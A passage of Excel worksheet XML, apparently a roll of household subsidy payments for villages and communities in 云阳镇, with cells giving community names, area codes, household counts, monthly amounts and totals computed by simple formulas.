      <c r="J1700" s="24"/>
      <c r="K1700" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1701" customHeight="1" spans="1:11">
      <c r="A1701" s="23" t="s">
        <v>4550</v>
      </c>
      <c r="B1701" s="24" t="str">
        <f>B1700</f>
        <v>云阳镇</v>
      </c>
      <c r="C1701" s="24" t="str">
        <f>C1700</f>
        <v>云钢社区</v>
      </c>
      <c r="D1701" s="62" t="s">
        <v>4551</v>
      </c>
      <c r="E1701" s="43" t="s">
        <v>4552</v>
      </c>
      <c r="F1701" s="24" t="str">
        <f>F1700</f>
        <v>4113210599</v>
      </c>
      <c r="G1701" s="24"/>
      <c r="H1701" s="24"/>
      <c r="I1701" s="24">
        <f t="shared" si="26"/>
        <v>0</v>
      </c>
      <c r="J1701" s="24"/>
      <c r="K1701" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1702" customHeight="1" spans="1:11">
      <c r="A1702" s="23" t="s">
        <v>4553</v>
      </c>
      <c r="B1702" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1702" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1702" s="24" t="s">
        <v>4554</v>
      </c>
      <c r="E1702" s="24" t="s">
        <v>3580</v>
      </c>
      <c r="F1702" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1702" s="24">
        <v>1</v>
      </c>
      <c r="H1702" s="25">
        <v>365</v>
      </c>
      <c r="I1702" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1702" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1702" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1703" customHeight="1" spans="1:11">
      <c r="A1703" s="23" t="s">
        <v>4555</v>
      </c>
      <c r="B1703" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1703" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1703" s="24" t="s">
        <v>4556</v>
      </c>
      <c r="E1703" s="24" t="s">
        <v>4557</v>
      </c>
      <c r="F1703" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1703" s="24">
        <v>1</v>
      </c>
      <c r="H1703" s="25">
        <v>365</v>
      </c>
      <c r="I1703" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1703" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1703" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1704" customHeight="1" spans="1:11">
      <c r="A1704" s="23" t="s">
        <v>4558</v>
      </c>
      <c r="B1704" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1704" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1704" s="24" t="s">
        <v>4559</v>
      </c>
      <c r="E1704" s="24" t="s">
        <v>4560</v>
      </c>
      <c r="F1704" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1704" s="24">
        <v>1</v>
      </c>
      <c r="H1704" s="25">
        <v>365</v>
      </c>
      <c r="I1704" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1704" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1704" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1705" customHeight="1" spans="1:11">
      <c r="A1705" s="23" t="s">
        <v>4561</v>
      </c>
      <c r="B1705" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1705" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1705" s="24" t="s">
        <v>4562</v>
      </c>
      <c r="E1705" s="24" t="s">
        <v>4563</v>
      </c>
      <c r="F1705" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1705" s="24">
        <v>1</v>
      </c>
      <c r="H1705" s="24">
        <v>500</v>
      </c>
      <c r="I1705" s="24">
        <f t="shared" si="26"/>
        <v>500</v>
      </c>
      <c r="J1705" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1705" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1706" customHeight="1" spans="1:11">
      <c r="A1706" s="23" t="s">
        <v>4564</v>
      </c>
      <c r="B1706" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1706" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1706" s="24" t="s">
        <v>4565</v>
      </c>
      <c r="E1706" s="24" t="s">
        <v>4566</v>
      </c>
      <c r="F1706" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1706" s="24">
        <v>1</v>
      </c>
      <c r="H1706" s="25">
        <v>365</v>
      </c>
      <c r="I1706" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1706" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1706" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1707" customHeight="1" spans="1:11">
      <c r="A1707" s="23" t="s">
        <v>4567</v>
      </c>
      <c r="B1707" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1707" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1707" s="24" t="s">
        <v>4568</v>
      </c>
      <c r="E1707" s="24" t="s">
        <v>3786</v>
      </c>
      <c r="F1707" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1707" s="24">
        <v>1</v>
      </c>
      <c r="H1707" s="25">
        <v>365</v>
      </c>
      <c r="I1707" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1707" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K1707" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1708" customHeight="1" spans="1:11">
      <c r="A1708" s="23" t="s">
        <v>4569</v>
      </c>
      <c r="B1708" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1708" s="24" t="s">
        <v>4306</v>
      </c>
      <c r="D1708" s="24" t="s">
        <v>4570</v>
      </c>
      <c r="E1708" s="24" t="s">
        <v>4571</v>
      </c>
      <c r="F1708" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1708" s="24">
        <v>2</v>
      </c>
      <c r="H1708" s="25">
        <v>325</v>
      </c>
      <c r="I1708" s="24">
        <f t="shared" si="26"/>
        <v>650</v>
      </c>
      <c r="J1708" s="24" t="s">
        <v>4572</v>
      </c>
      <c r="K1708" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1709" customHeight="1" spans="1:11">
      <c r="A1709" s="23" t="s">
        <v>4573</v>
      </c>
      <c r="B1709" s="24" t="str">
        <f>B1708</f>
        <v>云阳镇</v>
      </c>
      <c r="C1709" s="24" t="str">
        <f>C1708</f>
        <v>老城社区</v>
      </c>
      <c r="D1709" s="63" t="s">
        <v>4574</v>
      </c>
      <c r="E1709" s="64" t="s">
        <v>4575</v>
      </c>
      <c r="F1709" s="24" t="str">
        <f>F1708</f>
        <v>4113210523</v>
      </c>
      <c r="G1709" s="24"/>
      <c r="H1709" s="24"/>
      <c r="I1709" s="24">
        <f t="shared" si="26"/>
        <v>0</v>
      </c>
      <c r="J1709" s="24"/>
      <c r="K1709" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1710" customHeight="1" spans="1:11">
      <c r="A1710" s="23" t="s">
        <v>4576</v>
      </c>
      <c r="B1710" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1710" s="24" t="s">
        <v>4306</v>
      </c>
      <c r="D1710" s="24" t="s">
        <v>4577</v>
      </c>
      <c r="E1710" s="24" t="s">
        <v>4578</v>
      </c>
      <c r="F1710" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1710" s="24">
        <v>2</v>
      </c>
      <c r="H1710" s="25">
        <v>325</v>
      </c>
      <c r="I1710" s="24">
        <f t="shared" si="26"/>
        <v>650</v>
      </c>
      <c r="J1710" s="24" t="s">
        <v>4572</v>
      </c>
      <c r="K1710" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1711" customHeight="1" spans="1:11">
      <c r="A1711" s="23" t="s">
        <v>4579</v>
      </c>
      <c r="B1711" s="24" t="str">
        <f>B1710</f>
        <v>云阳镇</v>
      </c>
      <c r="C1711" s="24" t="str">
        <f>C1710</f>
        <v>老城社区</v>
      </c>
      <c r="D1711" s="65" t="s">
        <v>4580</v>
      </c>
      <c r="E1711" s="66" t="s">
        <v>4581</v>
      </c>
      <c r="F1711" s="24" t="str">
        <f>F1710</f>
        <v>4113210523</v>
      </c>
      <c r="G1711" s="24"/>
      <c r="H1711" s="24"/>
      <c r="I1711" s="24">
        <f t="shared" si="26"/>
        <v>0</v>
      </c>
      <c r="J1711" s="24"/>
      <c r="K1711" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1712" customHeight="1" spans="1:11">
      <c r="A1712" s="23" t="s">
        <v>4582</v>
      </c>
      <c r="B1712" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1712" s="24" t="s">
        <v>4583</v>
      </c>
      <c r="D1712" s="24" t="s">
        <v>4584</v>
      </c>
      <c r="E1712" s="24" t="s">
        <v>4372</v>
      </c>
      <c r="F1712" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1712" s="24">
        <v>3</v>
      </c>
      <c r="H1712" s="25">
        <v>320</v>
      </c>
      <c r="I1712" s="24">
        <f t="shared" si="26"/>
        <v>960</v>
      </c>
      <c r="J1712" s="24" t="s">
        <v>4572</v>
      </c>
      <c r="K1712" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1713" customHeight="1" spans="1:11">
      <c r="A1713" s="23" t="s">
        <v>4585</v>
      </c>
      <c r="B1713" s="24" t="str">
        <f>B1712</f>
        <v>云阳镇</v>
      </c>
      <c r="C1713" s="24" t="str">
        <f>C1712</f>
        <v>小关居委会五组</v>
      </c>
      <c r="D1713" s="63" t="s">
        <v>4586</v>
      </c>
      <c r="E1713" s="64" t="s">
        <v>3637</v>
      </c>
      <c r="F1713" s="24" t="str">
        <f>F1712</f>
        <v>4113210521</v>
      </c>
      <c r="G1713" s="24"/>
      <c r="H1713" s="24"/>
      <c r="I1713" s="24">
        <f t="shared" si="26"/>
        <v>0</v>
      </c>
      <c r="J1713" s="24"/>
      <c r="K1713" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1714" customHeight="1" spans="1:11">
      <c r="A1714" s="23" t="s">
        <v>4587</v>
      </c>
      <c r="B1714" s="24" t="str">
        <f>B1713</f>
        <v>云阳镇</v>
      </c>
      <c r="C1714" s="24" t="str">
        <f>C1713</f>
        <v>小关居委会五组</v>
      </c>
      <c r="D1714" s="67" t="s">
        <v>4588</v>
      </c>
      <c r="E1714" s="68" t="s">
        <v>3631</v>
      </c>
      <c r="F1714" s="24" t="str">
        <f>F1713</f>
        <v>4113210521</v>
      </c>
      <c r="G1714" s="24"/>
      <c r="H1714" s="24"/>
      <c r="I1714" s="24">
        <f t="shared" si="26"/>
        <v>0</v>
      </c>
      <c r="J1714" s="24"/>
      <c r="K1714" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1715" customHeight="1" spans="1:11">
      <c r="A1715" s="23" t="s">
        <v>4589</v>
      </c>
      <c r="B1715" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1715" s="24" t="s">
        <v>4590</v>
      </c>
      <c r="D1715" s="24" t="s">
        <v>4591</v>
      </c>
      <c r="E1715" s="24" t="s">
        <v>4592</v>
      </c>
      <c r="F1715" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1715" s="24">
        <v>1</v>
      </c>
      <c r="H1715" s="25">
        <v>365</v>
      </c>
      <c r="I1715" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1715" s="24" t="s">
        <v>4572</v>
      </c>
      <c r="K1715" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1716" customHeight="1" spans="1:11">
      <c r="A1716" s="23" t="s">
        <v>4593</v>
      </c>
      <c r="B1716" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1716" s="24" t="s">
        <v>4594</v>
      </c>
      <c r="D1716" s="24" t="s">
        <v>4595</v>
      </c>
      <c r="E1716" s="24" t="s">
        <v>4596</v>
      </c>
      <c r="F1716" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1716" s="24">
        <v>1</v>
      </c>
      <c r="H1716" s="25">
        <v>365</v>
      </c>
      <c r="I1716" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1716" s="24" t="s">
        <v>4572</v>
      </c>
      <c r="K1716" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1717" customHeight="1" spans="1:11">
      <c r="A1717" s="23" t="s">
        <v>4597</v>
      </c>
      <c r="B1717" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1717" s="24" t="s">
        <v>4598</v>
      </c>
      <c r="D1717" s="24" t="s">
        <v>4599</v>
      </c>
      <c r="E1717" s="24" t="s">
        <v>3826</v>
      </c>
      <c r="F1717" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1717" s="24">
        <v>1</v>
      </c>
      <c r="H1717" s="25">
        <v>365</v>
      </c>
      <c r="I1717" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1717" s="24" t="s">
        <v>4572</v>
      </c>
      <c r="K1717" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1718" customHeight="1" spans="1:11">
      <c r="A1718" s="23" t="s">
        <v>4600</v>
      </c>
      <c r="B1718" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1718" s="24" t="s">
        <v>4594</v>
      </c>
      <c r="D1718" s="24" t="s">
        <v>4601</v>
      </c>
      <c r="E1718" s="24" t="s">
        <v>4602</v>
      </c>
      <c r="F1718" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1718" s="24">
        <v>2</v>
      </c>
      <c r="H1718" s="25">
        <v>325</v>
      </c>
      <c r="I1718" s="24">
        <f t="shared" si="26"/>
        <v>650</v>
      </c>
      <c r="J1718" s="24" t="s">
        <v>4572</v>
      </c>
      <c r="K1718" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1719" customHeight="1" spans="1:11">
      <c r="A1719" s="23" t="s">
        <v>4603</v>
      </c>
      <c r="B1719" s="24" t="str">
        <f>B1718</f>
        <v>云阳镇</v>
      </c>
      <c r="C1719" s="24" t="str">
        <f>C1718</f>
        <v>小关居委会二组</v>
      </c>
      <c r="D1719" s="63" t="s">
        <v>4604</v>
      </c>
      <c r="E1719" s="64" t="s">
        <v>4605</v>
      </c>
      <c r="F1719" s="24" t="str">
        <f>F1718</f>
        <v>4113210521</v>
      </c>
      <c r="G1719" s="24"/>
      <c r="H1719" s="24"/>
      <c r="I1719" s="24">
        <f t="shared" si="26"/>
        <v>0</v>
      </c>
      <c r="J1719" s="24"/>
      <c r="K1719" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1720" customHeight="1" spans="1:11">
      <c r="A1720" s="23" t="s">
        <v>4606</v>
      </c>
      <c r="B1720" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1720" s="24" t="s">
        <v>4583</v>
      </c>
      <c r="D1720" s="24" t="s">
        <v>4607</v>
      </c>
      <c r="E1720" s="24" t="s">
        <v>4521</v>
      </c>
      <c r="F1720" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1720" s="24">
        <v>1</v>
      </c>
      <c r="H1720" s="25">
        <v>365</v>
      </c>
      <c r="I1720" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1720" s="24" t="s">
        <v>4572</v>
      </c>
      <c r="K1720" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1721" customHeight="1" spans="1:11">
      <c r="A1721" s="23" t="s">
        <v>4608</v>
      </c>
      <c r="B1721" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1721" s="24" t="s">
        <v>4346</v>
      </c>
      <c r="D1721" s="24" t="s">
        <v>4609</v>
      </c>
      <c r="E1721" s="24" t="s">
        <v>4610</v>
      </c>
      <c r="F1721" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1721" s="24">
        <v>1</v>
      </c>
      <c r="H1721" s="25">
        <v>365</v>
      </c>
      <c r="I1721" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1721" s="24" t="s">
        <v>4572</v>
      </c>
      <c r="K1721" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1722" customHeight="1" spans="1:11">
      <c r="A1722" s="23" t="s">
        <v>4611</v>
      </c>
      <c r="B1722" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1722" s="24" t="s">
        <v>4612</v>
      </c>
      <c r="D1722" s="24" t="s">
        <v>4613</v>
      </c>
      <c r="E1722" s="24" t="s">
        <v>1312</v>
      </c>
      <c r="F1722" s="24" t="s">
        <v>4614</v>
      </c>
      <c r="G1722" s="24">
        <v>1</v>
      </c>
      <c r="H1722" s="25">
        <v>365</v>
      </c>
      <c r="I1722" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1722" s="24" t="s">
        <v>4615</v>
      </c>
      <c r="K1722" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1723" customHeight="1" spans="1:11">
      <c r="A1723" s="23" t="s">
        <v>4616</v>
      </c>
      <c r="B1723" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1723" s="24" t="s">
        <v>4153</v>
      </c>
      <c r="D1723" s="24" t="s">
        <v>4617</v>
      </c>
      <c r="E1723" s="24" t="s">
        <v>4618</v>
      </c>
      <c r="F1723" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1723" s="24">
        <v>1</v>
      </c>
      <c r="H1723" s="25">
        <v>365</v>
      </c>
      <c r="I1723" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1723" s="24" t="s">
        <v>4615</v>
      </c>
      <c r="K1723" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1724" customHeight="1" spans="1:11">
      <c r="A1724" s="23" t="s">
        <v>4619</v>
      </c>
      <c r="B1724" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1724" s="24" t="s">
        <v>4620</v>
      </c>
      <c r="D1724" s="24" t="s">
        <v>4621</v>
      </c>
      <c r="E1724" s="24" t="s">
        <v>3566</v>
      </c>
      <c r="F1724" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1724" s="24">
        <v>1</v>
      </c>
      <c r="H1724" s="25">
        <v>365</v>
      </c>
      <c r="I1724" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1724" s="24" t="s">
        <v>4615</v>
      </c>
      <c r="K1724" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1725" customHeight="1" spans="1:11">
      <c r="A1725" s="23" t="s">
        <v>4622</v>
      </c>
      <c r="B1725" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1725" s="24" t="s">
        <v>4620</v>
      </c>
      <c r="D1725" s="24" t="s">
        <v>4623</v>
      </c>
      <c r="E1725" s="24" t="s">
        <v>3829</v>
      </c>
      <c r="F1725" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1725" s="24">
        <v>1</v>
      </c>
      <c r="H1725" s="25">
        <v>365</v>
      </c>
      <c r="I1725" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1725" s="24" t="s">
        <v>4615</v>
      </c>
      <c r="K1725" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1726" customHeight="1" spans="1:11">
      <c r="A1726" s="23" t="s">
        <v>4624</v>
      </c>
      <c r="B1726" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1726" s="24" t="s">
        <v>4620</v>
      </c>
      <c r="D1726" s="24" t="s">
        <v>4625</v>
      </c>
      <c r="E1726" s="24" t="s">
        <v>4626</v>
      </c>
      <c r="F1726" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1726" s="24">
        <v>2</v>
      </c>
      <c r="H1726" s="25">
        <v>325</v>
      </c>
      <c r="I1726" s="24">
        <f t="shared" si="26"/>
        <v>650</v>
      </c>
      <c r="J1726" s="24" t="s">
        <v>4615</v>
      </c>
      <c r="K1726" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1727" customHeight="1" spans="1:11">
      <c r="A1727" s="23" t="s">
        <v>4627</v>
      </c>
      <c r="B1727" s="24" t="str">
        <f>B1726</f>
        <v>云阳镇</v>
      </c>
      <c r="C1727" s="24" t="str">
        <f>C1726</f>
        <v>南召店村袁庄组</v>
      </c>
      <c r="D1727" s="69" t="s">
        <v>4628</v>
      </c>
      <c r="E1727" s="69" t="s">
        <v>4629</v>
      </c>
      <c r="F1727" s="24" t="str">
        <f>F1726</f>
        <v>4113210519</v>
      </c>
      <c r="G1727" s="24"/>
      <c r="H1727" s="24"/>
      <c r="I1727" s="24">
        <f t="shared" si="26"/>
        <v>0</v>
      </c>
      <c r="J1727" s="24"/>
      <c r="K1727" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1728" customHeight="1" spans="1:11">
      <c r="A1728" s="23" t="s">
        <v>4630</v>
      </c>
      <c r="B1728" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1728" s="24" t="s">
        <v>4583</v>
      </c>
      <c r="D1728" s="24" t="s">
        <v>4631</v>
      </c>
      <c r="E1728" s="24" t="s">
        <v>3779</v>
      </c>
      <c r="F1728" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1728" s="24">
        <v>1</v>
      </c>
      <c r="H1728" s="25">
        <v>365</v>
      </c>
      <c r="I1728" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1728" s="24" t="s">
        <v>4615</v>
      </c>
      <c r="K1728" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1729" customHeight="1" spans="1:11">
      <c r="A1729" s="23" t="s">
        <v>4632</v>
      </c>
      <c r="B1729" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1729" s="24" t="s">
        <v>4633</v>
      </c>
      <c r="D1729" s="24" t="s">
        <v>4634</v>
      </c>
      <c r="E1729" s="24" t="s">
        <v>1132</v>
      </c>
      <c r="F1729" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1729" s="24">
        <v>2</v>
      </c>
      <c r="H1729" s="25">
        <v>325</v>
      </c>
      <c r="I1729" s="24">
        <f t="shared" si="26"/>
        <v>650</v>
      </c>
      <c r="J1729" s="24" t="s">
        <v>4615</v>
      </c>
      <c r="K1729" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1730" customHeight="1" spans="1:11">
      <c r="A1730" s="23" t="s">
        <v>4635</v>
      </c>
      <c r="B1730" s="24" t="str">
        <f>B1729</f>
        <v>云阳镇</v>
      </c>
      <c r="C1730" s="24" t="str">
        <f>C1729</f>
        <v>小关居委会</v>
      </c>
      <c r="D1730" s="70" t="s">
        <v>4636</v>
      </c>
      <c r="E1730" s="71" t="s">
        <v>4637</v>
      </c>
      <c r="F1730" s="24" t="str">
        <f>F1729</f>
        <v>4113210521</v>
      </c>
      <c r="G1730" s="24"/>
      <c r="H1730" s="24"/>
      <c r="I1730" s="24">
        <f t="shared" si="26"/>
        <v>0</v>
      </c>
      <c r="J1730" s="24"/>
      <c r="K1730" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1731" customHeight="1" spans="1:11">
      <c r="A1731" s="23" t="s">
        <v>4638</v>
      </c>
      <c r="B1731" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1731" s="24" t="s">
        <v>4598</v>
      </c>
      <c r="D1731" s="24" t="s">
        <v>4639</v>
      </c>
      <c r="E1731" s="24" t="s">
        <v>3575</v>
      </c>
      <c r="F1731" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1731" s="24">
        <v>1</v>
      </c>
      <c r="H1731" s="25">
        <v>365</v>
      </c>
      <c r="I1731" s="24">
        <f t="shared" si="26"/>
        <v>365</v>
      </c>
      <c r="J1731" s="24" t="s">
        <v>4640</v>
      </c>
      <c r="K1731" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1732" customHeight="1" spans="1:11">
      <c r="A1732" s="23" t="s">
        <v>4641</v>
      </c>
      <c r="B1732" s="72" t="s">
        <v>3543</v>
      </c>
      <c r="C1732" s="72" t="s">
        <v>4598</v>
      </c>
      <c r="D1732" s="72" t="s">
        <v>4642</v>
      </c>
      <c r="E1732" s="72" t="s">
        <v>2566</v>
      </c>
      <c r="F1732" s="72" t="s">
        <v>3547</v>
      </c>
      <c r="G1732" s="72">
        <v>2</v>
      </c>
      <c r="H1732" s="73">
        <v>345</v>
      </c>
      <c r="I1732" s="24">
        <f t="shared" ref="I1732:I1795" si="27">H1732*G1732</f>
        <v>690</v>
      </c>
      <c r="J1732" s="72" t="s">
        <v>4640</v>
      </c>
      <c r="K1732" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1733" customHeight="1" spans="1:11">
      <c r="A1733" s="23" t="s">
        <v>4643</v>
      </c>
      <c r="B1733" s="24" t="str">
        <f>B1732</f>
        <v>云阳镇</v>
      </c>
      <c r="C1733" s="24" t="str">
        <f>C1732</f>
        <v>小关居委会三组</v>
      </c>
      <c r="D1733" s="74" t="s">
        <v>4644</v>
      </c>
      <c r="E1733" s="74" t="s">
        <v>4645</v>
      </c>
      <c r="F1733" s="24" t="str">
        <f>F1732</f>
        <v>4113210521</v>
      </c>
      <c r="G1733" s="24"/>
      <c r="H1733" s="24"/>
      <c r="I1733" s="24">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="J1733" s="24"/>
      <c r="K1733" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1734" customHeight="1" spans="1:11">
      <c r="A1734" s="23" t="s">
        <v>4646</v>
      </c>
      <c r="B1734" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1734" s="24" t="s">
        <v>4647</v>
      </c>
      <c r="D1734" s="24" t="s">
        <v>4648</v>
      </c>
      <c r="E1734" s="24" t="s">
        <v>3631</v>
      </c>
      <c r="F1734" s="24" t="s">
        <v>4165</v>
      </c>
      <c r="G1734" s="24">
        <v>1</v>
      </c>
      <c r="H1734" s="25">
        <v>365</v>
      </c>
      <c r="I1734" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1734" s="24" t="s">
        <v>4640</v>
      </c>
      <c r="K1734" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1735" customHeight="1" spans="1:11">
      <c r="A1735" s="23" t="s">
        <v>4649</v>
      </c>
      <c r="B1735" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1735" s="24" t="s">
        <v>4650</v>
      </c>
      <c r="D1735" s="24" t="s">
        <v>4651</v>
      </c>
      <c r="E1735" s="24" t="s">
        <v>3872</v>
      </c>
      <c r="F1735" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1735" s="24">
        <v>1</v>
      </c>
      <c r="H1735" s="25">
        <v>365</v>
      </c>
      <c r="I1735" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1735" s="24" t="s">
        <v>4640</v>
      </c>
      <c r="K1735" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1736" customHeight="1" spans="1:11">
      <c r="A1736" s="23" t="s">
        <v>4652</v>
      </c>
      <c r="B1736" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1736" s="24" t="s">
        <v>4153</v>
      </c>
      <c r="D1736" s="24" t="s">
        <v>4653</v>
      </c>
      <c r="E1736" s="24" t="s">
        <v>3598</v>
      </c>
      <c r="F1736" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1736" s="24">
        <v>1</v>
      </c>
      <c r="H1736" s="25">
        <v>365</v>
      </c>
      <c r="I1736" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1736" s="24" t="s">
        <v>4654</v>
      </c>
      <c r="K1736" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1737" customHeight="1" spans="1:11">
      <c r="A1737" s="23" t="s">
        <v>4655</v>
      </c>
      <c r="B1737" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1737" s="24" t="s">
        <v>4656</v>
      </c>
      <c r="D1737" s="24" t="s">
        <v>4657</v>
      </c>
      <c r="E1737" s="24" t="s">
        <v>4658</v>
      </c>
      <c r="F1737" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1737" s="24">
        <v>1</v>
      </c>
      <c r="H1737" s="25">
        <v>365</v>
      </c>
      <c r="I1737" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1737" s="24" t="s">
        <v>4654</v>
      </c>
      <c r="K1737" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1738" customHeight="1" spans="1:11">
      <c r="A1738" s="23" t="s">
        <v>4659</v>
      </c>
      <c r="B1738" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1738" s="24" t="s">
        <v>4153</v>
      </c>
      <c r="D1738" s="24" t="s">
        <v>4660</v>
      </c>
      <c r="E1738" s="24" t="s">
        <v>3637</v>
      </c>
      <c r="F1738" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1738" s="24">
        <v>1</v>
      </c>
      <c r="H1738" s="25">
        <v>365</v>
      </c>
      <c r="I1738" s="24">
        <f t="shared" si="27"/>
        <v>365</v>
      </c>
      <c r="J1738" s="24" t="s">
        <v>4661</v>
      </c>
      <c r="K1738" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1739" customHeight="1" spans="1:11">
      <c r="A1739" s="23" t="s">
        <v>4662</v>
      </c>
      <c r="B1739" s="24" t="s">
        <v>3543</v>
      </c>
